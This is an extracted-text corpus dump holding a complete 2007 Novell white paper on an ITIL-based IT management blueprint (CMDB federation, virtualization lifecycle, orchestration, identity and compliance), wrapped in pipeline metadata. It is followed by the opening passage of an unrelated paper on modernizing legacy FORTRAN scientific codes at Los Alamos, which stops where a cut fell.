29372, 11], [29372, 31302, 12], [31302, 33552, 13], [33552, 35185, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35185, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
628defed078a4d80d22bc81233e150d9d79acfc4
A Blueprint for Better Management from the Desktop to the Data Center March 2007 Table of Contents Executive Summary .............................................................................................................................. 3 IT Infrastructure Library (ITIL) ........................................................................................................... 5 Blueprint for Desktop to Data Center Management ................................................................. 8 A New Model of Computing ............................................................................................................. 14 Appendix—Open Standards and Open Source ............................................................................. 16 Executive Summary There has been no greater change in IT management thinking in the last 30 years than the burgeoning focus on Service-Oriented Architecture and Infrastructure. Simply put, instead of focusing solely on what IT work is done, organizations are now calling on CIOs to focus on how well IT delivers its full spectrum of services to support the bottom line. If an employee needs access to a service, they don’t care where the persistent data is stored, how the client-side, middleware or server software is instantiated, which servers it’s running on and what operating systems are required. They never did care. They only want the service, preferably every time they require access, with no unexpected interruptions or processing delays. We live in an on-demand world, and the technobabble IT department excuses and limitations are no longer tolerated by today’s businesses. Service-Oriented Infrastructure creates new challenges for CIOs who already are governed by legislation to ensure and attest to authorized access, control wasteful power consumption and balance over-provisioning with redundancy for disaster tolerance. Now, IT organizations are consolidating their operating systems, servers and storage, and are implementing technologies like virtualization to overcome the static limitations of service deployment and continuity management that exist in the physical world. Delivering services to users requires successful implementation of all the management disciplines, but you must go further—these disciplines must interact seamlessly on behalf of the service delivery. For example, for the CIO to access SAP resources on the network, the system must understand authorizations, roles and other security issues; check on the configuration and patch levels of the access device; enact Change Management and potentially Release Management processes; track issues or problems with service continuity management; and potentially provision new service-oriented components, requiring licensing and approvals. At any stage in this process, dropping into a manual procedure will violate the service-level objective. All of these silos must work together to achieve CIOs’ dreams of an automated service delivery infrastructure. Adding fuel to the fire are security risks, regulations (Sarbanes-Oxley [SOX] and the Health Insurance Portability and Accountability Act [HIPAA]), the need to implement IT best practices (the IT Infrastructure Library [ITIL] and Control Objectives for Information and Related Technology [COBIT]) and requirements set forth in new standards (International Organization for Standardization [ISO] 20000, the first international standard for IT service management). “... IT needs to find clearer, more relevant metrics for showing business alignment and relevance, service quality supportive of that alignment, and cost efficiency in delivering its service products to the business. Moreover, IT is also being asked to support compliance and security initiatives that are adding extra relevance and context to this drive towards accountability. — Enterprise Management Associates, “Getting Started with ITIL’s CMDB...,” Sept. 2006 Most forward-thinking CIOs are basing their process-management improvements around ITIL. Any successful product architecture will need to be built from the ground up with ITIL services as its central core. With the publication of ITIL 3 (ISO 20000) in 2007, a large increase in the adoption of ITIL is expected in the U.S., which currently lags the rest of the world in ITIL adoption. No single management software vendor will be able to provide all the pieces required to deliver on CIOs’ dreams for a Service-Oriented Infrastructure. Fortunately, standards for product interaction have matured to the point where one can depend on them to provide seamless integration of third-party and partner products as well as extensions customers make themselves. IT Service Management (ITSM) removes traditional IT silos, informal processes and firefighting, and this blueprint for management also identifies viable industry standards and points of integration with existing products and systems. In this paper, we wish to continue our interaction with two diverse audiences. First, we plan to increase our support of the open source development community by creating an open systems management architecture that encourages innovation with respect to the higher-order problems of distributed systems management. We invite you to think big about code that manages storage for thousands of virtual machines (VMs)—one of many exciting challenges ahead. We think it’ll be fun. Second, this paper is written for those whose job it is to manage information technology. You are faced with the difficult task of figuring out what tools are available—commercially or via open source—and whether, when and how to use them, while keeping track of licensing and integration and providing determinism with respect to your business. And you are expected to adhere to the concepts of ITIL that provide increased service levels for lower cost. Our strategy is to build an open management architecture that offers distinct value through sophisticated integration of otherwise isolated components: “One of the overall design goals is to create a computing system which is capable of meeting all of the requirements of a large computer utility. Such systems must run continuously and reliably 7 days a week, 24 hours a day... and must be capable of meeting wide service demands.... Because the system must ultimately be comprehensive and able to adapt to unknown future requirements, its framework must be general, and capable of evolving over time.” – Corbató and Vyssotsky on Multics, http://www.multicians.org/fjcc1.html, 1965 **IT Infrastructure Library (ITIL)** ITIL provides best-practice guidelines and architectures on all aspects of end-to-end service management to ensure that IT processes are closely aligned with business processes and that IT delivers the correct and appropriate business solutions. ITIL is neither a technology standard, nor is it regulations, and therefore there are no entities—including tools, and people—that can be deemed “ITIL compliant.” Processes and organizations, however, can be assessed against the British Standard Institution’s BS 15000, the ISO 20000 standard or COBIT. COBIT and ITIL are not mutually exclusive and can be combined to provide powerful control of and IT governance for IT service management as well as a best-practice framework. Enterprises that want to put their ITIL program into the context of a wider control and governance framework should use COBIT. ![Figure 1: A comprehensive management blueprint helps align IT processes with user needs and business goals.](image) ITIL is a comprehensive set of best practices that focus on determining IT service delivery and business efficiency. ITIL outlines methods for IT planning, models and processes, and it establishes the required roles and relationships to execute those processes. The ITIL framework also establishes the working relationship among an organization’s service providers, which could include the service desk, application developers, roll-out teams, network managers, building technicians and outside contractors. It calls for unified processes for all service providers in an organization, helping them work together and coordinate projects more easily. Today's IT manager is less interested in technology as a single means to solve problems and save money. IT technology and products alone don't yield the desired end result and return on investment. Both people and processes must be aligned for maximum benefit. Good processes comprise both technology and people to define work flow, operations, decision making and approvals. Think of it in terms of rolling out a new desktop operating system. Tools may automate the physical delivery of the operating system and software, but if the local building technicians learn about the roll post-facto, the results will be disastrous. Several organizations must work together to ensure minimal disruption to service and to maintain high user satisfaction. ITIL establishes a common language and terminology across both internal and external IT groups. For example, a Change Advisory Board (CAB) comprises representatives from various IT and service organizations and is responsible for analyzing and approving changes to the standardized environment. Decisions made by the CAB, along with reported incidents and their resolutions are captured in the Change Management Database (CMDB). This database of knowledge is made available to all of an organization's service providers for better communication and cooperation. The ITIL framework provides an effective foundation for quality IT service management. It is, however, only a framework. The methodologies have been defined, but as you implement them you need to refine them to fit your organization and goals. If one of the processes is bad, it will affect service quality until you resolve the issue. Defining and documenting your processes is an ongoing effort. It takes time, but you can consider it time well spent if you’re serious about implementing ITIL. In addition to helping provide swift service to your users, you need such best practices in place to help you capture and assess your corporate asset data for both financial and regulatory compliance needs—no matter how large or small your organization. **ITIL Components** ITIL’s two major components are Service Delivery and Service Support. Service Delivery and Service Support cover more of the day-to-day operational processes of IT management. Some of the most common ITIL components are: - Configuration Management - Release Management - Change Management - Incident Management - Problem Management - Availability Management **Configuration Management** Configuration Management provides the foundation for successful IT service management and underpins every other process. The fundamental deliverable is the CMDB, comprising one or more integrated databases detailing all of the organization’s IT infrastructure components and other important associated assets. It is these assets, known as Configuration Items (CIs), that deliver IT services. What sets a CMDB apart from an ordinary asset register are the relationships, or links, that define how each CI is interconnected and interdependent with its neighbors. These relationships allow activities such as impact analyses and “what if?” scenarios to be carried out efficiently. out. Ideally, the CMDB also contains details of any incidents, problems, known errors and changes associated with each CI. **Release Management** The Release Management process takes a holistic view of changes to IT services, considering all aspects of a release, both technical and non-technical. Release Management is responsible for all legal and contractual obligations for all hardware and software the organization uses. In order to meet this responsibility and protect the IT assets, it establishes secure environments for hardware in the Definitive Hardware Store (DHS) and for software in the Definitive Software Library (DSL). **Change Management** A change is initiated to resolve a problem, and a proposal is submitted for approval. A detailed plan is prepared to implement change, with a rollback plan acting as a safety net. After implementing the change, the requestor needs to verify that the change was successful. **Incident Management** Incident Management is responsible for the management of all incidents from detection and recording through to resolution and closure. The objective is the restoration of normal service as soon as possible with minimal disruption to the business. **Problem Management** Problem Management assists Incident Management by managing all major incidents and problems while endeavoring to record all workarounds and “quick fixes” as known errors where appropriate, and raising changes to implement permanent structural solutions wherever possible. Problem Management also analyzes and trends incidents and problems to proactively prevent future issues. **Availability Management** Availability Management ensures that each service meets or exceeds its availability targets and is proactively improved on an ongoing basis. In order to achieve this, Availability Management monitors, measures, reports on and reviews the availability, reliability, maintainability, serviceability and security of each service and component. Novell® has engaged in many months’ research with hundreds of CIOs and service partners. The result of this research is a blueprint for solutions that can attack the overall problem while still being useful in the individual silos. The blueprint looks at the fundamental elements from the point of view of both the CIO and ITIL. Business Process and Technology The ITIL framework seeks to bring both business processes and technology together via a series of interrelated management disciplines. The blueprint acknowledges this effort by echoing the need for business process and technology to work together. To simplify how this can be achieved, we present a set of blueprint blocks that provide a solution in CIO terms, followed by a mapping of the ITIL services used to answer those questions. The blueprint has to cover all the computing resources in a typical organization, including personal, handheld and telecommunications devices as well as desktops, servers, storage and network connections. It must recognize and create virtual environments that emulate any or all of these resources. Finally, it must deal with applications and their virtual instantiations, with full knowledge of usage and licensing implications. Discover The first and foremost problem for CIOs is identifying what they have in their infrastructure at any given point in time. Although many tools are capable of discovering devices, there are often multiple entries for the same device and varying sets of data about the device. Discovery includes accurately identifying and being able to describe resources. This can be as low level as processor type, reboot capability, virtualization capabilities, out-of-band management, hardware components and even server power supply rating. The services available to both users and other services must continually be discovered and put into a real-time service catalog; and just as important are application dependencies, in terms of both configuration and their interaction with active services in the operating environment. The only way for Change Management processes to understand the downstream impacts of possible changes is to discover the dependencies in the environment. The discovery process can be restricted to various classes of IP subnets, and uses both agent and agentless techniques—including Internet Control Message Protocol (ICMP) ping, Simple Network Management Protocol (SNMP) Get and TCP port probing—to discover the IT infrastructure and its applications. Applications are discovered by matching discovered artifacts with defined application attributes including file locations, registry settings and service signatures—a process called application fingerprinting. Relate Once all the resources have been identified, it is equally important to know how they interact with each other in terms of dependencies and capacity and bandwidth requirements. With the introduction of virtualization this issue becomes more acute. VMs require physical devices they can run on, “pinning” information such as IP addresses and storage location and control of the lifecycle itself. These relationships are captured in a “model” and stored in databases. The model must build in permanent relation facilities for discovered resources. We are suggesting that the systems management blueprint have an evolving model of relationships, and that this be accomplished through a federated CMDB (FCMDB). A CMDB is a database that contains all the details about employees, workstations, devices, incidents, problems and changes as well as complete details of all the components in the business. It provides the basis for a public knowledgebase of known errors and solutions, which helps employees resolve minor incidents themselves without contacting the helpdesk. It also provides a private knowledgebase where the support staff can get detailed reports about all assets, with problem histories, workarounds and temporary fixes included. As mentioned earlier, within this context, components of an information system are referred to as CIs. The processes of Configuration Management seek to specify, control and track CIs and any changes made to them in a comprehensive and systematic fashion. We suggest that the federated model, where many systems can be originators (and maintainers) of CIs, is much more practical for any but the smallest of organizations. This approach avoids the biggest pitfall of early ITIL implementations—the creation and maintenance of the universal CMDB. The federated approach allows the individual systems to continue as they always have, while also cooperating in a “virtual” CMDB that has access to CIs and their relationships. The Discovery processes will populate the CMDB with CIs according to the evolving models. Outside systems such as human resources systems will also create CIs. For example, a typical policy would be “all employees and contractors can only be created by PeopleSoft.” The FCMDB will appear as a single database to the higher layers of the model without the pitfalls of actually creating a single, enormous, centralized duplicative database. Contain and Instantiate In the new service-oriented world, virtualization is critical. However, with virtualization comes a new set of management challenges. The introduction of virtual machine operating system “images” as a first-class IT asset necessitates OS image lifecycle management—for instantiation, usage and retirement. Additionally, cloning new OS images from templates versus creating and deploying new images is also required. Cloning is optimal for transient workloads, compared to OS images that are version controlled as part of a change-control strategy. OS images must be managed, leaving IT to ask key questions: “How do I control who defines and creates an OS image?”, “What is the process for rolling out to production?” and “How do I manage change for virtual machines?” A second challenge is that once multiple virtual machines have been deployed to a physical server, multiple applications and business systems are critically affected in the event of a server failure. It is no longer enough to just replace a downed server and suffer a short application outage. The blueprint describes clustered virtual machine servers for hosting services in virtual machines—with rapid redeployment of services should a physical server fail. Today, businesses have to define “blackout” periods, the windows of time that IT “owns” in order to patch or update systems to better secure them or to support new application features. These blackout periods mean that some or all of the business must come to a halt for the blackout period. In our global economy, where business runs 24x7, this may cost a company millions in revenue. The business needs a way to assign priority between the update and the needs of the business. The ability to dynamically allocate resources through pre-emption, or starving can offer the business the best case for maintaining the balance between business process and systems maintenance. The IT Service Management Forum (iTSMF) has published Software Asset Management processes that concentrate on the specific demands of managing an organization’s software assets and all issues related to asset use. Software Asset Management is comprised of three processes: Core Asset Management, Logistics and Relationships. Core Asset Management Processes Core Asset Management processes identify software assets, maintain information about them throughout their lifecycles and manage physical assets related to software. With the advent of virtualization, lifecycle control becomes far more complex. In the asset model of the past, IT was challenged with recording asset “tags” for physical devices and tracking their whereabouts until they were fully depreciated and retired. Software was tracked by version and license count, and retired mostly by an upgrade. In today’s virtualized environment, IT needs to know where an image comes from, why it was created, what state it is in, how to store it and make it available for use, and who can use it, for how long and when. The Contain and Instantiate blocks address these issues by combining new image-creation services with proposed standards for describing the lifecycle of the image-creation process. **Logistic Processes** The management data that describes the creation portion of the lifecycle covers only a portion of the VM lifecycle. Once the OS image has been created, it is necessary to store and “stage” the image for use. The storage process requires similar data collection: where is the image stored, who stored it there, and when, and how it is to be used? There are two types of OS images at this point: templates and deployable images. Templates are “gold master” images that are copied (cloned), and then deployed. Deployable images are directly moved to the target resource where they are run. The Systems Virtualization, Partitioning and Cluster (SVPC) Working Group at the DMTF has defined a management model that describes these stages of VM lifecycle management. The blueprint uses this proposed standard to ensure consistent lifecycle management for all VMs, regardless of their vendors. **Relationship Processes** Relationship processes manage all relationships within the business and with partners and suppliers, according to agreed-upon contractual, legal and documented service terms and targets relating to software use. The blueprint addresses service terms and licensing compliance. Tools like Novell ZENworks® Asset Management provide both license checking and reporting. Policies govern the use of software and can be configured to provide alerts or restrict usage when one is out of compliance with licensing terms. **Manage** The fundamental core of the entire system are the individual “spokes,” the ITIL functional processes required—all or in part—to manage any sizeable IT organization. For our purposes, we will separate them into two categories: first, Service Management, which consists of both Service Delivery and Service Support, and second, Application Management. **Service Delivery and Service Support** The Service Management components of ITIL, as we stated earlier, deal more with the day-to-day support and maintenance processes of Service Support and Service Delivery. In this category, we also place IT Provisioning for both physical and virtual environments, self-service, storage management and license management. All of these processes create and/or deploy identities and CIs, and make changes to them according to policy. These processes can also accommodate human intervention, of course, as automated management policies cannot cover all contingencies. A combination of two or three different systems are normally engaged to enable these tasks, and depending on the number of platforms supported, potentially several more: configuration and storage management systems are closely tied to particular platforms because small details can greatly improve the usefulness of a particular product. We expect that in the near future, standards maturation will allow for single systems to manage resources ranging from personal devices to the data center; specialized large systems will be brought along later. Of course, the commercially available systems will cross over the theoretical lines drawn by ITIL. Provisioning, for example, is accomplished in change-, configuration-, storage- and identity-management software. The single-product process paradigm is becoming rarer, and even then, interoperability will be a basic requirement. **Applications Management** A key issue that has existed for some time is the problem of moving application developers and IT service management closer together. Service-management considerations within all phases of the application lifecycle have been seriously deficient. Applications need to be deployed with service-management requirements included: that is, they need to be designed and built for operability, availability, reliability, maintainability, performance and manageability. Moreover, they should be tested for compliance to specifications. **Application Development** is concerned with the activities needed to plan, design and build an application that can ultimately be used by some part of the organization to address a business requirement. The blueprint introduces the notion of a creation service for images. This service will contain management data about the build process but will not address the need to “instrument” applications for better service management. IT cannot guarantee the absence of problems in a production environment, so it must have established remediation procedures to discover problems, alert remediation systems and actually fix the problems. These systems are usually a combination of automation and human intervention. Some issues, like disaster failover, can be fully automated; others, like diagnosing a particularly tricky application problem, are almost entirely staff-centric. But most problems require a combination of automation and human intervention, if only to discover the problem in the first place. This is also an area in which a pervasive identity security and management fabric can enable substantial evolution: as assets and individuals are persistently recognized, many problems will disappear, including authorization issues (passwords) and security violations. As these problems are resolved, the IT staff will have more time to discover and diagnose difficult problems. **Orchestration** The next challenge on the horizon is automating resources. CIOs are faced with the mandate to “do more with less.” To meet this objective, they resort to draconian cuts in the numbers or types of devices supported and in the people that maintain those resources. Simple “trusted” tasks are left to the management software to fix, or a failing device is replaced with another “hot spare.” Several management tools are trying to address these issues by introducing workflows or best practice policies that CIOs can trust and a smaller IT staff can easily use. The panacea for management is to not have to know about it at all. The notion here is that one can define the business need in either policy or workflow—or perhaps in plain language—and the management system will simply figure out what resources need to be deployed when and where. Although this point has not been reached, given virtualization, such a system may be realized in the not-too-distant future. The Orchestration block introduces the notion of workloads. A workload is a task that the business process requires to meet the objectives of the business. Within this block, we look at all the compute resources as the total compute power in the enterprise, both desktops and servers. When a workload is desired, it is deployed to the best location, either physical or virtual, in which it can be run. The orchestrator allocates or reserves compute resources for the workload. For example, there are times when the business needs to prioritize work to meet certain business objectives. At these times the orchestrator can preempt other workloads or move them to allow for the higher priority workload to execute. Should all the compute resources be busy at the time when the higher-priority workload is needed, the orchestrator can starve another workload by taking its resources and later giving them back. This orchestration allows the organization to do what it does best, while understanding the service-level expectations of both the business and IT. Or in other words, it keeps the business moving! **Visualize** Finally, there is the notion that one console can do it all. In reality, there are three kinds of needs for which consoles may be developed. The dashboard view is targeted at the CIO who wants to know the overall state of the system. This management dashboard provides either color-coded event strings or colored-coded images that represent servers or applications. In the operator's console, on the other hand, workflows can be launched or a VM deployed or some other “operation” or remediation performed to keep the system up and running according to the Service Level Agreement (SLA). Finally, there is the developer’s console, which allows policies to be written, and VMs and workflows to be defined. Any or all of these consoles may be graphical user interfaces (GUIs), command-line interpreters or Web pages. In most cases, they are a combination of all three. The CIO gets a simple overall view from a business perspective, while the IT personnel have to decide which console to use, and when. **Monitor** In the area of resource monitoring there are already many ways to observe information about common resources. In fact, many resource providers support several of the current standard application programming interfaces (APIs) in an effort to publish information to the widest audience possible. However, there is a constant tradeoff in performance and other factors when providing all the data to anyone requesting it. This has led to support for standardized, purpose-driven APIs that try to focus the amount of data being requested. However, although these APIs have often been agreed upon and implemented, the data made available is not always consistent. The units of measure as well as the meaning of the terms are critical. For example is "available memory" of 2000 a measure of megabytes of RAM or gigabytes of disk space? Historically, each data consumer leveraged some mechanism—often a local agent—that managed its access to the resource through a published API. These agents were in conflict with each other, causing customers to pick specific vendor solutions that implicitly excluded others. Because use of the data varied, and vendors typically did not cover every use case, end users encountered significant problems. The users were also left with the cost of ownership and administration of these agents, as they had to mix and match agents depending on the tools they wanted to use. End users are now demanding agentless environments when environments provide native collection systems. The price to be paid for increased automation is that we have to monitor the system and bring exceptions to light for remediation on a nearly instantaneous basis. We must continually monitor servers, OSes, applications and services to make sure SLAs are met and that the policies established do not result in over-allocation of capacity, power or storage. We must also be aware that systems break and that business processes may be poorly defined, allowing automation to run in ways that we might not anticipate. Monitoring (with control and remediation capabilities) is critical to keep the system from producing unwanted results. **Security and Identity** IT Security Management is the process of managing a defined level of security for information, IT services and infrastructure. IT Security Management ensures that: Security controls are implemented and maintained to address changing circumstances such as changed business and IT service requirements, IT architecture elements, threats and so forth. Audit results show the adequacy of security controls and measures taken. Reports are produced to show the status of information security. Under ITIL, the functions that we think of as “security” are separated into several processes. Identity management, security event management and patch management are part of security in most people’s minds, but these are separate processes under ITIL. The Security Management process involves taking standard policies and enforcing them in real time. The core of our vision rests on an identity fabric that is woven throughout the entire model. All of the participants—employees, managers, customers, partners, devices and locations—must be identified and have roles assigned in order for policies to be effective. The only way to reconcile multiple discoveries on the same devices is to have a permanent identity that persists throughout the lifecycle of the entity. For example, we may have a desktop machine that has certain components in a central database, including a biometric authorization component (fingerprint reader). When the CFO signs onto this machine, we want to check that the machine is authorized and is configured according to policy: it would be OK for a new application to be added (as long as it’s not a keystroke scanner!), for example, but not for the fingerprint reader to disappear. We need persistent identity of the machine, user and important components to reconcile ongoing discovery for our policy engine to make accurate decisions. The Bandit project, [http://www.bandit-project.org](http://www.bandit-project.org), is a set of loosely coupled components that provides consistent identity services for authentication, authorization and auditing. Bandit implements open standard protocols and specifications such that identity services can be constructed, accessed and integrated from multiple identity sources. Bandit components support many authentication methods and provide user-centric credential management. And Bandit is building additional services needed for Role Based Access Control (RBAC) and for the emission of records to verify compliance with higher-level policies. One area where we are currently extending identity is in the realm of VMs. Not only will we identify potential VMs in a repository, but we will also be able to identify and track instantiated VMs in the production environment—as well as the applications running under them—for license and usage analysis. **Audit and Compliance** All IT systems, but especially those that touch customer records, financials and other strategic corporate data, must be auditable. Today’s standards for IT audits require a compliance monitoring system. These systems are constantly testing events to see if any activity violates corporate IT policies, whether those relate to outside regulations or simply are internal IT governance choices. Auditors do not prescribe how companies should comply, but they do insist on compliance processes. The blueprint must have compliance built in, and it must pervade all elements to succeed. **A New Model of Computing** The classic computer has CPUs, memory and disks to hold data when the power is turned off. Virtual memory gave computers the ability to present the illusion to applications of more main memory than was physically available. Virtual disks create the illusion of a larger or more fault-tolerant disk compared to the many physical disks they comprise. VMs present the illusion of a whole computer that is actually contained by a real computer sharing its physical resources among competing virtual machines. Clusters present the illusion of a single reliable computer by coupling together and masking the failures of physical computers. Virtualization eliminates physically imposed static boundaries: CPU, memory and disks are allocated dynamically. Services and data gain mobility: the freedom to optimally consume physical resources and the ability to rapidly switch to alternate physical resources while adapting to workload demands. High availability is a natural consequence of virtualized systems. Today, data center computers (servers) are connected to disks over a storage area network (SAN). By removing and relocating storage from individual servers to a central network location, server form factors have shrunk. Blade servers are now popular. Blades are granted access to virtual disks (named storage containers) located inside SAN disk arrays. When a server fails, processing fails over to another server with access to the same SAN virtual disks. When a service (running on a server) runs out of storage, more space can be allocated from the SAN, using standard management APIs. When services themselves are virtualized, by hosting inside a VM, they gain the flexibility to migrate from one physical server to another. Legacy line-of-business (LOB) applications are also being virtualized. Static, monolithic client/server software is being augmented or replaced with Web services. Web-based Service-Oriented Architecture (SOA) replaces earlier distributed object systems. There are new WS- protocols for anything that wasn’t XML-based before. And LOB applications now comprise a number of cooperating services. Infrastructure services provide naming, discovery, and via XML, a data integration and exchange format. LOB components execute in VMs and communicate using Web services protocols. SOA and WS- protocols are creating a new platform for distributed computing. Finally, with so many distributed moving parts, identity management creates the infrastructure necessary to securely name and associate, authenticate and authorize service consumers with producers regardless of service type. Identity is the context that binds a flow of service requests all the way from the end user through multiple processing tiers to data on disks. Users are granted rights to services, and services are granted rights to other services. And if we haven’t experienced enough virtualization yet, identity itself has been virtualized by the notion of “role.” The blueprint, based on ITIL, embraces this new model of computing and turns the CIO’s dream of service on demand as part of business solutions into a reality. Appendix—Open Standards and Open Source IPMI, SMASH, SMI-S, and SVPC-V are all DMTF CIM-based management profiles that describe models and APIs for server, storage and virtualization management. WS-Management provides Web-services-based access to these and other existing management profiles, via translation of model objects and relationships into XML schema and SOAP for transport-level interoperability. Bandit Bandit implements open standard protocols and specifications such that identity services can be constructed, accessed and integrated from multiple identity sources. Bandit components support many authentication methods and provide user-centric credential management. On this base of a common identity model, Bandit is building additional services needed for Role-Based Access Control (RBAC) and for the emission of records to verify compliance with higher-level policies. Since every IT resource has an identity, Bandit's implementation of open access control will provide the foundation for trust when managing virtual resources and their relationships. Common Information Model (CIM) A normative definition (and model) of management information for systems, networks, applications and services. CIM enables systems and management application vendors to exchange and act on semantically rich management information (www.dmtf.org). Systems Management Architecture for Server Hardware (SMASH) Novell was a founding member of the Open Management with CIM project, which promotes an open source implementation of SMASH and related profiles (www.omc-project.org). Storage Area Network (SAN) A storage-specific network that connects multiple servers to centralized storage subsystems. Fibre Channel and iSCSI are common technologies for creating a SAN. SUSE® Linux Enterprise 10 includes the latest open source support for iSCSI and Virtual N_Ports necessary for virtual machine mobility on Fibre Channel networks. Novell is also working to instrument storage components as described by SMI-S. Storage Management Initiative Specification (SMI-S) An ANSI standard for managing storage (network) devices (www.snia.org/smi). Novell is a member of SNIA and participates in both the SMI-Lab and the Aperi open source SMI-S platform project (www.eclipse.org/aperi). Virtual Machine Monitor (VMM) Support for a number of execution environments on a single computer, each of which emulates the host computer. This provides services with the illusion of owning an entire computer, but one that is a "private" machine, isolated from others, sharing a single physical machine. The software that provides this capability is called a virtual machine monitor or hypervisor. Novell is working with the open source Xen hypervisor project and via the DMTF System Virtualization, Partitioning and Cluster working group, to help define an interoperable standard for virtual machine lifecycle management. For more information about this collaboration, visit: http://wiki.xensource.com/xenwiki/XenCim **Web-Based Enterprise Management (WBEM)** A set of standards developed to unify the management of distributed computing environments. WBEM provides the foundation for the industry to deliver well-integrated standards-based management tools, facilitating the exchange of data across otherwise disparate technologies and platforms ([www.dmtf.org/standards/wbem/](http://www.dmtf.org/standards/wbem/)). **WS-Management** WS-Management addresses the cost and complexity of IT management by providing a common way for systems to access and exchange management information across the entire IT infrastructure. By using Web services to manage IT systems, deployments that support WS-Management will enable IT managers to remotely access devices on their networks. Novell is working with the [www.Openwsman.org](http://www.Openwsman.org) project with the goal to provide a complete WS-Management stack, using CIM to provide the system management information. The main focus is to support mapping CIM data into WS-Management and reuse existing agents (providers) currently available. © 2007 Novell, Inc. All rights reserved. Novell, the Novell logo, the N logo, ZENworks and SUSE are registered trademarks of Novell, Inc. in the United States and other countries. *Linux is a registered trademark of Linus Torvalds. All other third-party trademarks are the property of their respective owners.* © Copyright itSMF, 2004
{"Source-Url": "https://www.netiq.com/docrep/documents/87ee2bxb17/A_Management%20Blueprint_WP_Final_03-07-07_en.pdf", "len_cl100k_base": 7947, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 32391, "total-output-tokens": 8678, "length": "2e12", "weborganizer": {"__label__adult": 0.0003981590270996094, "__label__art_design": 0.0009307861328125, "__label__crime_law": 0.0007762908935546875, "__label__education_jobs": 0.0036258697509765625, "__label__entertainment": 0.00021982192993164065, "__label__fashion_beauty": 0.0002312660217285156, "__label__finance_business": 0.0230255126953125, "__label__food_dining": 0.0003325939178466797, "__label__games": 0.0008935928344726562, "__label__hardware": 0.006351470947265625, "__label__health": 0.0009355545043945312, "__label__history": 0.0005168914794921875, "__label__home_hobbies": 0.0003418922424316406, "__label__industrial": 0.0019397735595703125, "__label__literature": 0.00033092498779296875, "__label__politics": 0.0003437995910644531, "__label__religion": 0.0004341602325439453, "__label__science_tech": 0.31103515625, "__label__social_life": 0.0001575946807861328, "__label__software": 0.29345703125, "__label__software_dev": 0.3525390625, "__label__sports_fitness": 0.00023245811462402344, "__label__transportation": 0.0006914138793945312, "__label__travel": 0.0003561973571777344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43185, 0.00507]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43185, 0.1743]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43185, 0.93578]], "google_gemma-3-12b-it_contains_pii": [[0, 82, false], [82, 766, null], [766, 4332, null], [4332, 6553, null], [6553, 8213, null], [8213, 11366, null], [11366, 13343, null], [13343, 14858, null], [14858, 18477, null], [18477, 21667, null], [21667, 24967, null], [24967, 28806, null], [28806, 32361, null], [32361, 35980, null], [35980, 38774, null], [38774, 41771, null], [41771, 43185, null]], "google_gemma-3-12b-it_is_public_document": [[0, 82, true], [82, 766, null], [766, 4332, null], [4332, 6553, null], [6553, 8213, null], [8213, 11366, null], [11366, 13343, null], [13343, 14858, null], [14858, 18477, null], [18477, 21667, null], [21667, 24967, null], [24967, 28806, null], [28806, 32361, null], [32361, 35980, null], [35980, 38774, null], [38774, 41771, null], [41771, 43185, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43185, null]], "pdf_page_numbers": [[0, 82, 1], [82, 766, 2], [766, 4332, 3], [4332, 6553, 4], [6553, 8213, 5], [8213, 11366, 6], [11366, 13343, 7], [13343, 14858, 8], [14858, 18477, 9], [18477, 21667, 10], [21667, 24967, 11], [24967, 28806, 12], [28806, 32361, 13], [32361, 35980, 14], [35980, 38774, 15], [38774, 41771, 16], [41771, 43185, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43185, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
dc0a3a020c3e2d397367d9ba940598d0079dceba
A Face-Lift for Aging FORTRAN Scientific Applications Teri Roberts and Skip Egdorf Abstract Los Alamos National Laboratory has a rich legacy of physics-based modeling codes that date back to the Manhattan Project in the 1940’s. As some of these codes have made the transition from the early weapons context in which they were first developed to a broader, industrial design and modeling context, they have retained constraints imposed by the limited structure of those early computing environments. These physics modeling codes represent decades of research and development. Advancement of the physics modeling in these codes has outpaced adoption of advances in computing technology. The availability of newer technologies such as parallel computing, distributed web applications, and advanced design paradigms compels evolution of these codes. As these codes evolve, their inherent value must be preserved and placed within the reach of a broader scientific audience. Constraints of Early Computing Environments Compared to today’s standards, early computing systems were slow, expensive and required large amounts of physical space. Economical use of precious resources dictated the programming practices of the day. Optimizations at a micro level were extremely important and common. Typical coding styles were very terse. For example, all variables local to a routine might be no more than two characters in length and all COMMON variables might be limited to three to six characters in length. Common program structures were limited to arrays. Massive use of EQUIVALENCE statements and offset indexing were often used to handle dynamic memory limits and variable array sizes. Comments were sparse. The concept of dynamic linking did not exist until introduced by Multics¹ in the late 1960s and did not become common until its implementation in Windows and UNIX² appeared in the late 1980s. Consequently, the common construction mechanism used to build executable programs was static linking of all code references into one monolithic image. Overlay mechanisms allowed these monolithic programs to run on severely limited memory resources. Integrating related programs was a challenge. Magnetic tapes or disk files were typically used as the basis for integration. Initial inputs were often limited to a card-image model of data. New capabilities were often added without full consideration of how the collection formed a coherent product. These constraints lead to a structure that is hard to approach except by individuals who are capable of grasping both the software structure inherent in the monolithic code and the physics concepts being modeled by the code. Such individuals are rare. **Encouraging Removal of Constraints** Today’s 